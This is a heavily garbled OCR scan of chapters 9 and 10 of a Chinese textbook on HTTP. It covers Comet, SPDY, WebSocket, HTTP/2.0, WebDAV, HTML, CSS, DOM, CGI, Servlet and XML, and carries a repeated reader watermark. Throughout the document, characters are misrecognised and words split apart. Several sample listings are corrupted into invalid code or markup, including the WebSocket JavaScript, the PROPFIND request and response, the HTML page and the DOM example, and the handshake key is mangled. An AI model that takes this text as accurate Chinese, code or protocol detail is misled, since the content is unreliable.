响应 _ 缩 数据 直 


2。 一 一 一 一 一 | “| 接 发 类 











: Ajax 通信 


Comet 的 解决 方法 
一 日 服务 器 端 有 内 容 更 新 了 ，Comet 不 会 让 请 求 等 待 ， 而 是 直接 给 





图 灵 社 区 会 员 Dylan.Y(yuanlongyoung@gmail.com) 专 享 尊重 版 权 


第 9 章 基于 HTTP 的 功能 追加 协议 


客户 端 返 回 啊 应 。 这 是 一 种 通过 延 开 应 答 ， 模 拟 实现 服务 套 端 回 客 户 端 
推送 ( Server Push ) 的 功能 。 

通常 ， 服 务 各 病 接收 到 请 求 ， 在 处 理 完毕 后 就 会 立即 返回 啊 应 ,但 
为 了 实现 推送 功能 ，Comet 会 先 将 啊 应 置 于 挂 起 状态 ， 当 服务 硕 端 有 内 
容 更 新 时 ， 再 返回 该 啊 应 。 因 此 ， 服 务 硕 端 一 旦 有 更 新 ， 就 可 以 立即 反 
侍 给 客户 闪 。 

内 容 上 虽然 可 以 做 到 实时 更 新 ， 但 为 了 保留 啊 应 ， 一 次 连接 的 持续 
时 间 也 变 长 了 。 期 间 ， 为 了 维持 连接 会 消耗 更 多 的 资源 。 另 外 ，Comet 
也 仍 未 解决 HITP 协议 本 里 存在 的 问题 。 




















































发 送 确认 
更 新 情况 
的 请 求 < 保留 响应 直 
| | 到 服务 器 内 容 
响应 有 更 新 > 
人 cS 
| a < 可 实现 页 面 的 一 旦 更 新 可 并 即 
QI 局 部 更 新 > 返回 响应 











有 时 不 压缩 数 
据 直 接 发 送 


: Comet 通信 


SPDY 的 目标 

陆续 出 现 的 Ajax 和 Comet 等 提高 易 用 性 的 技术 ， 一定 程度 上 使 
HTTP 得 到 了 改善 ， 但 HTTP 协议 本 时 的 限制 也 令 人 有 些 束 手 无 琳 。 为 
了 进行 根本 性 的 改善 ， 需 要 有 一 些 协 议 层 面 上 的 改动 。 
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处 于 持续 开发 状态 中 的 SPDY 协议 ， 正 是 为 了 在 协议 级 别 消除 
HTTP 所 焉 过 的 席 倾 。 


9.2.2 SPDY 的 设计 与 功能 

SPDY 没有 完全 改写 HTTP 协议， 而 是 在 TCP/IP 的 应 用 层 与 运输 
层 之 间 通 过 新 加 会 话 层 的 形式 运作 。 同 时 ， 考 虑 到 安全 性 问题 ，SPDY 
规定 通信 中 使 用 SSL。 

SPDY 以 会 话 层 的 形式 加 入 ， 控 制 对 数据 的 流动 ， 但 还 是 采用 
HTTP 建立 通信 连接 。 因 此， 可 照常 使 用 HTTP 的 GET 和 POST 等 方 
法 、Cookie 以 及 HTTP 报 文 等 。 





加 国立 帮 应 用 层 





SPDY 会 话 层 





表示 层 


”0 
CD 
CD 
[ 

4 





TEP 传输 层 


SPDY 介 于 TCP(SSL) 和 HTTP 之 间 
图 : SPDY 的 设计 
使 用 SPDY 后 ，HTTP 协议 额外 获得 以 下 功能 。 
多 路 复 用 流 
通过 单一 的 TCP 连接 ， 可 以 无 限制 处 理 多 个 HTTP 请求。 所 有 
请 求 的 处 理 都 在 一 条 TCP 连接 上 完成 ， 因 此 TCP 的 处 理 效率 得 到 


提高 。 





赋予 请 求 优 先 级 
SPDY 不 仅 可 以 无 限制 地 并 发 处 理 请 求 ， 还 可 以 给 请 求 逐个 分 配 优 
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先 级 顺序 。 这 样 主要 是 为 了 在 发 送 多 个 请 求 时 ， 解 决 因 带宽 低 而 导 
致 啊 应 杰 慢 的 问题 。 





压缩 HTTP 首部 
压缩 HTTP 请 求 和 响应 的 首部 。 这 样 一 来 ， 通 信 产 生 的 数据 包 数 量 
和 发 送 的 字 节 数 就 更 少 了 。 


推送 功能 
支持 服务 器 主动 向 客户 端 推送 数据 的 功能 。 这 样 ， 服 务 嚣 可 直接 发 
送 数 据 ， 而 不 必 等 待 客户 端的 请 求 。 


服务 器 提示 功能 

服务 各 可 以 主动 提示 客户 端 请 求 所 需 的 资源 。 由 于 在 客户 剖 发 现 资 
源 之 前 就 可 以 获知 资源 的 存在 ， 因 此 在 资源 已 缓存 等 情况 下 ， 可 以 
导 倪 发 送 不 必要 的 请 求 。 














9.2.3 SPDY 消除 Web 瓶颈 了 吗 

和 希望 使 用 SPDY 时 ，Web 的 内 容 绒 不 必 做 什么 特别 改动 ， 而 Web 
浏览 器 及 Web 服务 器 都 要 为 对 应 SPDY 做 出 一 定 程度 上 的 改动 。 有 好 
几 家 Web 浏览 需 已 经 针对 SPDY 做 出 了 相应 的 调整 。 另 外 ，Web 服务 
器 也 进行 了 实验 性 质 的 应 用 ， 但 把 该 技术 导入 实际 的 Web 网 站 却 进展 
不 佳 s 

因为 SPDY 基本 上 只 是 将 单个 域名 (IP 地 址 ) 的 通信 多 路 复 用 ， 
所 以 当 一 个 Web 网 站 上 使 用 多 个 域名 下 的 资源 ， 改 善 效果 就 会 受到 
限制 。 

SPDY 的 确 是 一 种 可 有 效 消除 HTTP 瓶颈 的 技术 ， 但 很 多 Web 网 
站 存在 的 问题 并 非 仅仅 是 由 HTTP 瓶颈 所 导致 。 对 Web 本 身 的 速度 提 
升 ， 还 应 该 从 其 他 可 细致 钻研 的 地 方 人 手 ， 比 如 改善 Web 内 容 的 编写 
NN 
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9.3 ”使 用 浏览 器 进行 全 双 工 通信 的 WebSocket 


利用 Ajax 和 Comet 技术 进行 通信 可 以 提升 Web 的 浏览 速度 。 但 问 
题 在 于 通信 车 使 用 HTTP 协议 ， 就 无 法 彻底 解决 瓶颈 问题 。WebSocket 
网 络 技术 正 是 为 解决 这 些 问题 而 实现 的 一 套 新 协议 及 API。 

当时 筹划 将 WebSocket 作为 HTMLS5 标准 的 一 部 分 ， 而 现在 它 却 逐 
渐变 成 了 独立 的 协议 标准 。WebSocket 通信 协议 在 2011 年 12 月 11 日 ， 
被 RFC 6455 - The WebSocket Protocol 定 为 标准 。 


9.3.1 WebSocket 的 设计 与 功能 

WebSocket， 即 Web 浏览 大 与 Web 服务 侣 之 间 全 双 工 通信 和 标准。 其 
中 ，WebSocket 协议 由 IETF 定 为 标准 ，WebSocket API 由 W3C 定 为 标 
准 。 仍 在 开发 中 的 WebSocket 技术 主要 是 为 了 解决 Ajax 和 Comet 里 
XMLHttpRequest 附和 之 的 缺陷 所 引起 的 问题 。 


9.3.2 WebSocket 协议 

一 日 Web 服务 右 与 客户 端 之 间 建 立 起 WebSocket 协议 的 通信 连接， 
之 后 所 有 的 通信 和 都 依靠 这 个 专用 协议 进行 。 通 信 过 程 中 可 互相 发 送 
JSON、XML、HTML 或 图 片 等 任意 格式 的 数据 。 

由 于 是 建立 在 HTTP 基础 上 的 协议 ， 因 此 连接 的 发 起 方 仍 是 客户 
疝 ， 而 一 旦 确立 WebSocket 通信 连接 ， 不 论 服 务 融 还 是 客户 端 ， 任 意 一 
方 都 可 直接 向 对 方 发 送 报 文 。 

下 面 我 们 列举 一 下 WebSocket 协议 的 主要 特点 。 


推送 功能 
支持 由 服务 器 向 客户 端 推 送 数据 的 推送 功能 。 这 样 ， 服 务 器 可 直接 
发 送 数据 ， 而 不 必 等 待 客户 端的 请 求 。 
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减少 通信 和 量 

只 要 建立 起 WebSocket 连接 ， 就 希望 一 直 保 持 连 接 状态 。 和 HTTP 
相 比 ， 不 但 每 次 连接 时 的 总 开销 减少 ， 而 且 由 于 WebSocket 的 首部 
言 息 很 小 ， 通 信和 量 也 相应 减少 了 。 





为 了 实现 WebSocket 通信 ， 在 HTTP 连接 建立 之 后 ， 需 要 完成 一 次 
“握手 ”( Handshaking ) 的 步 又 。 


国 握 手 … 请 求 
为 了 实现 WebSocket 通信 ， 需 要 用 到 HTTP 的 Upgrade 首部 字段 ， 
告知 服务 融通 信 协 议 发 生 改 变 ， 以 达到 握手 的 目的 。 





EET /cha El 

Hos Sen en me en 

Upgrade: websocket 

Connection: Upgrade 

Sec-WebSocket-Key: dGhlIHNhbXBsZSBuUub25]j2ZQ== 
Origin: http://example.com 
Sec-WebSocket-Protocol: chat, superchat 
Sec-WebSocket-Version: 13 


Sec-WebSocket-Key 字段 内 记录 着 握手 过 程 中 必 不 可 少 的 键 值 。 
Sec-WebSocket-Protocol 字段 内 记录 使 用 的 子 协议 。 

子 协 以 按 WebSocket 协议 标准 在 连接 分 开 使 用 时 ， 和 定义 那些 连接 的 
各 称 O 


国 握 手 . 员 应 
对 于 之 前 的 请 求 ， 返 回 状 态 码 101 Switching Protocols 的 啊 应 。 





HTTP/1.1 101 Switching Protocols 
Upgrade: websocket 


Sx 
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Connection: Upgrade 


Sec-WebSocket-Accept: s3pPLMBiTxaQ9kYGzzhZRbK+xOoO= 
Sec-WebSocket-Protocol: chat 


Sec-WebSocket-Accept 的 字段 值 是 由 握手 请 求 中 的 Sec-WebSocket- 
Key 的 字段 值 生成 的 。 











成 功 握 手 确 立 WebSocket 连接 之 后 ， 通 信 时 不 再 使 用 HTTP 的 数据 


帧 ， 而 采用 WebSocket 独立 的 数据 帧 。 


人 























客户 端 | 服务 器 
2 连接 刚 开始 时 还 是 
Upgrade: websocket HTTP 协 议 ， 所 以 由 
HTTP 握手 .响应 | 客户 端 先 发起 连接 
188 < 一 (0t Switching Protocols] 切换 成 
ee WebSocket 协 议 
WebSocket 的 URL 格 式 
ws://example.com/ 
WebSocket wss://example.com/ 
发 送 数 气 
VebSocket 协议 支 


发 送 数据 | 持 全 双 工 通信 ， 因 
-| 此 服务 器 端 不 必 等 
发 送 数据 | 待 请 求 , 可 直接 发 

< -人 | 送 数 据 


: WebSocket 通信 


国 WebSocket API 

JavaScript 可 调用 “The WebSocket API” ( http:/www.w3.org/TR/ 
websockets/， 由 W3C 标准 制定 ) 内 提供 的 WebSocket 程序 接口 ， 以 实 
现 WebSocket 协议 下 全 双 工 通信 。 

以 下 为 调用 WebSocket API， 每 50ms 发 送 一 次 数据 的 实例 。 
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var socket = new WebSocket ('ws://game.example.com:12010/updqates ' ) ; 
socket .onopen = function () { 
setlnterval(tuneeion() 
(selene 0 
socket .send (getUpdateData ()); 
| 


全 


9.4 ”期 盼 已 久 的 HTTP/2.0 


目前 主流 的 HTTP/1.1 标准 ， 自 1999 年 发 布 的 RFC2616 之 后 再 未 
进行 过 改 订 。SPDY 和 WebSocket 等 技术 纷纷 出 现 ， 很 难 断 言 HTTP/1.1 
仍 是 适用 于 当下 的 Web 的 协议 。 
负责 互联 网 技术 标准 的 IETF ( Internet Engineering Task Force， 互 
联网 工程 任务 组 ) 创立 httpbis ( Hypertext Transfer Protocol Bis，http:// 
datatracker.ietf.ore/wg/httpbis/ ) 工作 组 ， 其 目标 是 推进 下 一 代 HTTP 一 一 
HTTP/2.0 在 2014 年 11 月 实现 标准 化 。 





HTTP/2.0 的 特点 

HTTP/2.0 的 目标 是 改善 用 户 在 使 用 Web 时 的 速度 体验 。 由 于 基本 
上 都 会 先 通过 HTTP/1.1 与 TCP 连接 ， 现 在 我 们 以 下 面 的 这 些 协议 为 基 
础 ， 探 讨 一 下 它们 的 实现 方法 。 





® SPDY 
® HTTP Speed + Mobility 
® Network-Friendly HTTP Upgrade 


HTTP Speed + Mobility 由 微软 公司 起 草 ， 是 用 于 改善 并 提高 移动 

通信 时 的 通信 速度 和 性 能 的 标准 。 它 建立 在 Google 公司 提出 的 
SPDY 与 WebSocket 的 基础 之 上 。 

Network-Friendly HTTP Upgrade 主要 是 在 移动 端 通信 时 改善 HITP 
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性 能 的 标准 。 


HTTP/2.0 的 7 项 技术 及 讨论 

HTTP/2.0 围绕 着 主要 的 7 项 技术 进行 讨论 ， 现 阶段 (2012 年 8 月 
13 日 )， 大 都 倾 问 于 采用 以 下 协议 的 技术 。 但 是 ， 讨 论 仍 在 持续 ， 所 以 
不 能 排除 会 发 生 重大 改变 的 可 能 性 。 





表 9-1 


压缩 SPDY、Friendly 


多 路 复 用 SPDY 
TLSX 务 化 Speed + Mobility 
协商 Speed + Mobility, Friendly 


客户 端 拉 蝶 ( Client Pull ) /服务 器 推送 Speed + Mobility 
( Server Push 


) 
流量 控制 SPDY 


WebSocket Speed + Mobility 








注 : HTTP Speed + Mobility 简 写 为 Speed + Mobilty，Network-Friendly HTTP Upgrade 
简写 为 Friendly。 


9.5 Web 服务 器 管理 文件 的 WebDAV 


WebDAV ( Web-based Distributed Authoring and Versioning， 基 于 万 
维 网 的 分 布 式 创作 和 版 本 控制 ) 是 一 个 可 对 Web 服务 天 上 的 内 容 百 接 
进行 文件 复制 、 编 辑 等 操作 的 分 布 式 文件 系统 。 它 作为 扩展 HTTP/1.1 
的 协议 定义 在 RFC4918。 

除了 创建 、 删 除 文件 等 基本 功能 ， 它 还 具备 文件 创建 者 管理 、 文 件 
编辑 过 程 中 禁止 其 他 用 户 内 容 覆 盖 的 加 锁 功 能 ， 以 及 对 文件 内 容 修 改 的 
版 本 控制 功能 。 
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人 








VVebDAV 
WebDAV 直接 对 Web 服 务 器 上 的 文件 进行 操作 yey 
客户 端 » 务 
复制 / 剪 切 文件 
也 





名 


加 锁 / 解锁 文 件 








: WebDAV 


使 用 HTTP/1.1 的 PUT 方法 和 DELETE 方法 ， 就 可 以 对 Web 服务 


售 上 的 文件 进行 创建 和 删除 操作 。 可 是 出 于 安全 性 及 便捷 性 等 考虑 ， 一 
役 不 使 用 。 


9.5.1 扩展 HTTP/1.1 的 WebDAV 
针对 服务 右上 的 资源 ，WebDAYV 新 增加 了 一 些 概 念 ， 如 下 所 示 。 





Be 
Sel 





本 人 败 1024KB 
创建 者 : Ueno sen 





文件 A Da 文件 C 


集合 人 








: WebDAV 扩展 的 概念 
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集合 ( Collection ) : 是 一 种 统一 管理 多 个 资源 的 概念 。 以 集合 为 单位 
可 进行 各 种 操作 。 也 可 实现 类 似 集合 的 集合 这 样 的 荆 加 。 

资源 ( Resource ) : 把 文件 或 集合 称 为 资源 。 

属性 ( Property ) : 定义 资源 的 属性 。 定 义 以 “名 称 = 值 ”的 格式 执行 。 
锁 (Lock ) : 把 文件 设置 成 无 法 编辑 状态 。 多 人 同时 编辑 时 ， 可 防止 
在 同一 时 间 进 行内 容 写 入 。 


9.5.2 WebDAYV 内 新 增 的 方法 及 状态 码 
WebDAV 为 实现 远程 文件 管理 ， 向 HTTP/1.1 中 追加 了 以 下 这 些 方法 。 


PROPFIND : 获取 属性 
PROPPATCH : 修改 属性 
MKCOL : 创建 集合 
COPY : 复制 资源 及 属性 
MOVE : 移动 资源 
LOCK : 资源 加 锁 
UNLOCK : 资源 解锁 





为 配合 扩展 的 方法 ， 状 态 码 也 随 之 扩展 。 


102 Processing : 可 正常 处 理 请 求 ， 但 目前 是 处 理 中 状态 

207 Multi-Status : 存在 多 种 状态 

422 Unprocessible Entity : 格式 正确 ,内 容 有 误 

423 Locked : 资源 已 被 加 锁 

424 Failed Dependency : 处 理 与 某 请 求 关联 的 请 求 失败 ， 因 此 不 再 
维持 依赖 关系 

507 Insufficient Storage : 保存 空间 不 足 











国 WebDAYV 的 请 求实 例 
下 面 是 使 用 PROPFIND 方法 对 http://www.example.com/file 发 起 获 
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取 属 性 的 请 求 。 


PROPFIND /file HTTP/1.1 

Host: www.example.com 

Content-Type: application/xml; charset="utf-8" 
Gomaeens Tne: 


nama Oe Wer > 
<DoladrodElin wmlnes: DD= "DY: Ys 
<D:prop xmlns:R="http://ns.example.com/boxschema/"> 
<R ell ooo/ 全 
<R:author/> 
Re DlmeaALime,)s 
<R:Random/> 
/Dor 
DE ol 


下 面 是 针对 之 前 的 PROPFIND 方法 ， 返 回 http:/www.example.comy/ 
file 的 属性 的 啊 应 。 


FE OM es 
Conseene moe mae nm enarnsere ue eu 
Gomsemns non ed 


< Verglons=Ul OW Gneoollmee ve BY oS 
Dm es aes ma DAN > 


<D:response xmlns:R="http://ns.example.com/boxschema/"> 


<D:href >http://www.example.com/file</D:href> 
<ID glo OdeS 
< OE> 

<R 901dGEeS 
<R:BoxType>Box type A</R:BoxType> 
/ReldLoles 
RI aundrss 
<R:Name>J.J. Johnson</R:Name> 
</R:author> 


/DE 
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<Do Stave 200 国有 站 ES 
</D:propstat> 
Dadra 
=D Pop RR DinoAlinog/ SR Random/ Se /DD DroDsS 
<De EaEUVUSSETITD/1 ,1 403% Formiddenms/D: eed 
<D:responsedescription> The user does not have access to the 
anal a ly 
</D:responsedescription> 
</D:propstat> 
</D:response> 
<D:responsedescription> There has been an access violation error. 
</D:responsedescription> 
</DmultlisStatuss 


图 国 

图 国 
为 何 HTTP 协议 受众 如 此 广泛 

本 章 讲解 了 几 个 与 HTTP 相关 联 的 协议 使 用 案例 。 为 什么 HTTP 协议 
受众 能 够 如 此 广泛 呢 ? 

过 去 ， 新 编写 接 入 互联 网 的 系统 或 软件 时 ， 还 需要 同时 编写 实现 与 必 
要 功能 对 应 的 新 协议 。 但 最 近 ， 使 用 HTTP 的 系统 和 软件 占 了 绝 大 多 数 。 

这 有 着 诸多 原因 ， 其 中 与 企业 或 组 织 的 防火 墙 设 定 有 着 莫大 的 关系 。 
防火 墙 的 基本 功能 就 是 茶 止 非 指 定 的 协议 和 痛 口 号 的 数据 包 通 过 。 因 此 如 
果 使 用 新 协议 或 端口 号 则 必须 修改 防火 墙 设 置 。 

互联 网 上 ， 使 用 率 最 高 的 当 属 Web。 不 管 是 否 具备 访问 FTP 和 SSH 
的 权限 ， 一 般 公 司 都 会 开放 对 Web 的 访问 。Web 是 基于 HTTP 协议 运作 
的 ， 因 此 在 构建 Web 服务 器 或 访问 Web 站 点 时 ， 需 事先 设置 防火 墙 
HTTP( 80/tcp ) 和 HTTPS( 443/tcp ) 的 权限 。 

许多 公司 或 组 织 已 设 定 权 限 将 HTTP 作为 通信 环境 ， 因 此 无 须 再 修改 
防 估 霄 的 区 是 本 可 刚 呈 而 叶 二 有 大 疝 苹 芝 二 大 优 关 天 而 六 机 是 鞭 下 
HTTP 服务 或 内 容 不 断 增加 的 原因 之 一 。 

还 有 一 些 其 他 原因 ， 比 如 ， 作 为 HTTP 客户 端的 浏览 器 已 相当 普遍 ， 
HTTP 服务 器 的 数量 已 颇具 规模 ，HTTP 本 身 就 是 优异 的 应 用 等 。 

量 国 
国 图 
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第 10 章 
构建 Web 内 容 的 技术 


在 Web 刚 出 现时 , 我 们 只 能 浏览 那些 页 面 样式 简单 的 内 容 。 如 今 ， 
Web 使 用 各 种 各 样 的 技术 ， 来 呈现 丰 电 多 彩 的 内 容 。 
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上 四 四 四 
10.1 HTML 


10.1.1 Web 页 面 几乎 全 由 HTML 构建 

HTML ( HyperText Markup Language， 超 文本 标记 语言 ) 是 为 了 发 
送 Web 上 的 超 文 本 ( Hypertext ) 而 开发 的 标记 场 言 。 超 文本 是 一 种 文 
档 系 统 ， 可 将 文档 中 任意 位 置 的 信息 与 其 他 信息 ( 文本 或 图 片 等 ) 建立 
关联 ， 即 超 链接 文本 。 标 记 语 言 是 指 通过 在 文档 的 某 部 分 穿插 特别 的 字 
符 串 标签 ， 用 来 修饰 文档 的 语言 。 我 们 把 出 现在 HTML 文档 内 的 这 种 
特殊 字符 串 叫 做 HTML 标签 ( Tag )。 

平时 我 们 浏览 的 web 页面 几 乎 全 是 使 用 HIML 写成 的 。 由 
HTML 构成 的 文档 经 过 浏 响 右 的 解析 、 泻 染 后 ， 呈 现 出 来 的 结 末 就 是 
Web 页 面 。 


浏览 器 打开 由 HTML 写 成 的 文档 
ss 


HTML 



































就 可 浏览 泻 染 后 的 Web 页 面 


图 : HTML 








以 下 就 是 用 HTML 编写 的 文档 的 例子 。 而 这 份 HTML 文档 内 这 种 
被 <> 包围 着 的 文字 就 是 标签 。 在 标签 的 作用 下 ， 文 档 会 改变 样式 ,或 
插 和 图片、 链接。 


<html> 
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
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<titleshackr p< /Eitles 
<style type="text/css"> 
Og | 
pacing oO 
text-align: center; 


} 


</style> 
</head> 


<l©gN > 

< elases ooo 
< im sve nohnoeo jo ale "hoo width 2 40 fenome = 0/ /> 
< nm se nc ET hacki ey widehn hg od /DS 
<D><a href "neep /hackr J/ VShnackr J /a /pS 

RD 

</body> 

</html> 


10.1.2 HTML 的 版 本 

Tim Berners-Lee 提出 HTTP 概念 的 同时 ， 还 提出 了 HTML 原型 。 
1993 年 在 伊利 话 仇 大 学 的 NCSA ( The National Center for Supercomputing 
Applications ， 国 家 超级 计算 机 应 用 中 心 ) 发 布 了 Mosaic 浏览 右 (世界 
首 个 图 形 界 面 浏 览 需 程序 )， 而 能 够 被 Mosaic 解析 的 HIML ， 统 一 标准 
后 即 作为 HTML 1.0 发 布 。 

目前 的 最 新 版 本 是 HIML4.01 标准 ，1999 年 12 月 W3C ( World 
Wide Web Consortium ) 组 织 推 厦 使 用 这 一 版 本 。 下 一 个 版 本 ， 预 计 会 在 
2014 年 左右 正式 推荐 使 用 HIMLS 标准 。 

HTML5 标准 不 仅 解决 了 浏览 句 之 间 的 兼容 性 问题 ， 并 且 可 把 文本 
作为 数据 对 每 ， 更 容易 复 用 ， 动 画 等 效果 也 变 得 更 生动 。 

时 至 今日 ，HTML 仍 存 在 较 多 悬而未决 问题 。 有 些 浏览 顶 未 肚 循 
HTML 标准 实现 ， 或 扩展 目 用 标签 等 ， 这 都 反映 了 HTML 的 标准 实际 
上 尚未 统一 这 一 现状 。 

















外 1 
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10.1.3 ”设计 应 用 CSS 

CSS ( Cascading Style Sheets， 层 车 样式 表 ) 可 以 指定 如 何 展现 
HTML 内 的 各 种 元 素 ， 属 于 样式 表 标 准 之 一 。 即 使 是 相同 的 HTML 文 
档 ， 通 过 改变 应 用 的 CSS， 用 浏览 万 看 到 的 页 面 外 观 也 会 随 之 改变 。 
CSS 的 理念 就 是 让 文档 的 结构 和 设计 分 离 ， 达 到 解 看 的 目的 。 

下 面 让 我 们 来 看 一 个 CSS 的 用 例 。 


ele eA | 
Barelemer mon 
text-align: center; 


} 





可 在 选择 瘟 ( selector ) .logo 的 指定 范围 内 ， 使 用 个 括 起 来 的 声明 
块 中 写 明 的 padding: 20px 等 声明 语句 应 用 指定 的 样式 。 

可 通过 指定 HTML 元 系 或 特定 的 class、ID 等 作为 选择 大 来 限定 样 
式 的 应 用 范围 。 





10.2 动态 HTML 


10.2.1 让 Web 页 面 动 起 来 的 动态 HTML 

所 谓 动态 HTML ( Dynamic HTML )， 是 指使 用 客户 端 脚本 语言 将 静 
态 的 HIML 内 容 变 成 动态 的 技术 的 总 称 。 鼠 标 单 击 点 开 的 新 闻 、 
Google Maps 等 可 滚动 的 地 图 就 用 到 了 动态 HTML。 

动态 HTML 技术 是 通过 调用 客户 端 脚本 语言 JavaScript， 实 现 对 
HTML 的 Web 页 面 的 动态 改造 。 利 用 DOM ( Document Object Model， 
文档 对 象 模型 ) 可 指定 欲 发 生动 态 变 化 的 HTML 元 系 。 





10.2.2 ”更 易 控 制 HTML 的 DOM 
DOM 是 用 以 操作 HTML 文档 和 XML 文档 的 API(Application 


图 灵 社 区 会 员 Dylan.Y(yuanlongyoung@gmail.com) 专 享 尊重 版 权 


第 10 章 构建 Web 内 容 的 技术 


Programming Interface， 应 用 编程 接口 )。 使 用 DOM 可 以 将 HTML 内 的 
元 素 当 作对 象 操 作 ， 如 取出 元 素 内 的 字符 串 、 改 变 那 个 CSS 的 属性 等 ， 
使 页 面 的 设计 发 后 改变 。 

通过 调用 JavaScript 等 脚本 语言 对 DOM 的 操作 ， 可 以 以 更 为 简单 
的 方式 控制 HTML 的 改变 。 





ea 
<h1L> 繁 琐 的 Web 安全 </hil> 
<D> 第 | 部 分 Web 的 构成 元 素 </p> 
<D> 第 外 部 分 浏览 器 的 安全 功能 </p> 
<p> 第 中 部 分 接 下 来 发 生 的 事 </p> 
</body> 





比如 ， 从 JavaScript 的 角度 来 看 ， 将 上 述 HTML 文档 的 第 3 个 了 元 
素 (了 标签 ) 改变 文字 颜色 时 ， 会 像 下 方 这 样 编写 代码 。 





sen ee ee et 


Var content = document .getElementsByTagName ('P').; 
SonEenet [2 .8EYle .6050167 = HEOO0O00!'; 
/Set > 


document.getElementsByTagName(P") 语 句 调 用 getElementsByTagName 
陋 数 ， 从 整个 HTML 文档 ( document object ) 内 取出 P 了 元素。 接 下 来 的 
content[2].style.color = #FF0000' 语句 指定 content 的 索引 为 2 (第 3 个 ) 的 
元 素 的 样式 颜色 改 为 红色 《三 F0000 )。 

DOM 内 存在 各 种 函数 ,使 用 它们 可 查阅 HTML 中 的 各 个 元 系 。 
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10.3 Web 应 用 


10.3.1 通过 Web Gia Web 应 用 

Web 应 用 是 指 通过 Web 功能 提供 的 应 用 程序 。 比 如 购物 网 站 、 网 
上 银行 、SNS、BBS、 搜 索引 擎 和 e- 人 互联 网 ( Internet ) 或 
企业 内 网 ( Intranet ) 上 过 布 各 式 各 样 的 Web 应 用 。 

原本 应 用 HITP 协议 的 Web 的 机 制 就 是 对 客户 端 发 来 的 请 求 ， 返 
回 事前 准备 好 的 内 容 。 可 随 着 Web 越 来 越 普 及 ， 仅 靠 这 样 的 做 法 已 不 
足以 应 对 所 有 的 需求 ， 更 需要 引入 由 程序 创建 HTML 内 容 的 做 法 。 

类 似 这 种 由 程序 创建 的 内 容 称 为 动态 内 容 ， 而 事先 准备 好 的 内 容 称 
为 静态 内 容 。Web 应 用 则 作用 于 动态 内 容 之 上 。 


动态 内 容 ee 
请 求 ISBN=4798128090 4798128090 


Ds 
响应 
返回 由 Web 服 务 器 上 的 程序 | 
创建 的 HTML 内 容 
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响应 


返回 事先 已 编写 > | 
好 的 HTML 


图 : 动态 内 容 和 静态 内 容 








10.3.2 与 Web 服务 器 及 程序 协作 的 CGI 
CGI( Common Gateway Interface， 通 用 网 关 接 口 ) 是 指 Web 服务 磊 
在 接收 到 客户 端 发 送 过 来 的 请 求 后 转发 给 程序 的 一 组 机 制 。 在 CGI 的 
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作用 下 ， 程序 会 对 请 求 内 容 做 出 相应 的 动作 ， 比 如 创建 HTML 等 动态 
内 容 。 

使 用 CGI 的 程序 叫做 CGI 程序 ， 通 党 是 用 Perl、PHP、Ruby 和 C 
等 编程 语言 编写 而 成 。 











CGI 程序 











Web 服 务 器 


CGI 是 将 请 求 转 给 CGI 程序 处 理 的 一 种 机 制 2 


图 : CGI| 


有 关 CGI 更 为 翔实 的 内 容 请 参考 RFC3875“The Common Gateway 
Interface (CGD Version 1.1 


10.3.3 因 Java 而 普及 的 Servlet 

Servlet 是 一 种 能 在 服务 器 上 创建 动态 内 容 的 程序 。Servlet 是 用 
Java 语言 实现 的 一 个 接口 ， 属 于 面 回 企业 级 Java (JavaEE，Java 
Enterprise Edition ) 的 一 部 分 。 

之 前 提 及 的 CGI， 由 于 每 次 接 到 请 求 ， 程 序 都 要 跟着 启动 一 次 。 因 
此 一 旦 访问 量 过 大 ，Web 服务 需要 承担 相当 大 的 负载 。 而 Servlet 运行 











(D 没有 对 应 中 文 译名 , 全 称 是 Java Servlet。 名 称 取 自 Servlet=ServertApplet, 表 
示 轻 量 服务 程序 。 译 者 注 
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在 与 Web 服务 器 相同 的 进程 中 ， 因 此 受到 的 负载 较 小 ”。Servlet 的 运行 
环境 叫做 Web 容 侣 或 Servlet 容 俘 。 
Servlet 作为 解决 CGI 问题 的 对 抗 技 术 “， 随 Java 一 起 得 到 了 普及 。 


CGI 的 应 用 场景 


Ca ) 外 CGI 程序 
外 六 ca 程序 


每 次 请 求 都 启动 新 的 CGI 程序 











Servlet 的 应 用 场景 








VVebD 安 总 


S TL 


Servlet 











Servlet 运 行 在 Web 容 器 内 
图 : Servlet 
随 着 CGI 的 普及 ， 每 次 请 求 都 要 局 动 新 CGI 程序 的 CGI 运行 机 制 


未 渐 空 成 了 性 能 瓶 贷 ， 所 以 之 后 Servlet 和 mod perl 等 可 直接 在 Web 服 
务 从 上 运行 的 程序 才 得 以 开发 、 普 及 。 








〇 Servlet 常 驻 内 存 ， 因 此 在 每 次 请 求 时 ， 可 局 A 程 级 别 更 为 轻 量 的 
Servlet， 程 序 的 执行 效率 从 而 变 得 更 高 。 译 者 注 

@) 说 对 抗 的 原因 在 于 ， 这 个 方向 上 已 存在 用 Perl 编写 的 CGI， 实 现在 Apache 
HTTP Server 上 内 置 mod php 模块 后 可 运行 PHP 程 序 、 微 软 主 导 的 ASP 等 技 
起 译 者 注 
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10.4 数据 发 布 的 格式 及 语言 
10.4.1 可 扩展 标记 语言 


XML ( eXtensible Markup Language， 可 扩展 标记 语言 ) 是 一 种 可 按 
应 用 目标 进行 扩展 的 通用 标记 声言 。 旨 在 通过 使 用 XML， 使 互联 网 数 
据 共 享 变 得 更 容易 。 

XML 和 HTML 都 是 从 标准 通用 标记 语言 SGML ( Standard Generalized 
Markup Language ) 简化 而 成 。 与 HTML 相 比 ， 它 对 数据 的 记录 方式 做 
了 特殊 处 理 。 

下 面 我 们 以 HTML 编写 的 某 公 司 的 研讨 会 议 议程 为 例 进行 说 明 。 

















ema S 
<head> 
<title>T 公 司 研讨 会 介绍 </title> 203 
</head> 
eq 
<h1>T 公 司 研 讨 会 介绍 </nh1L> 
< > 
<1i> 研 讨 会 编号 : TR001 
a> 
<1i>Web 应 用 程序 胸 弱 性 诊断 讲座 </11> 
/ws 
/A 
<1i> 研 讨 会 编号 : TR002 
b> 
<1i> 网络 系 统 脆弱 性 诊断 讲座 </1i> 
</ul> 
/li 
/Ls 
</body> 
/Ine 


用 浏览 带 打 开 该 文档 时 ， 就 会 显示 排列 的 列表 内 容 ， 但 如 末 这 些 数 
据 被 其 他 程序 读 取 会 发 生 什 么 ?” 某 些 程序 虽然 具备 可 通过 识别 布局 特征 
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nn 





取出 文本 的 方法 ,但 这 份 HTML 的 样式 一 旦 改变 ， 要 读 取 数据 内 容 也 
束 变 得 相对 困难 了 。 可 见 ， 为 了 保持 数据 的 正确 读 取 ，HTML 不 适合 用 
来 记录 数据 结构 。 

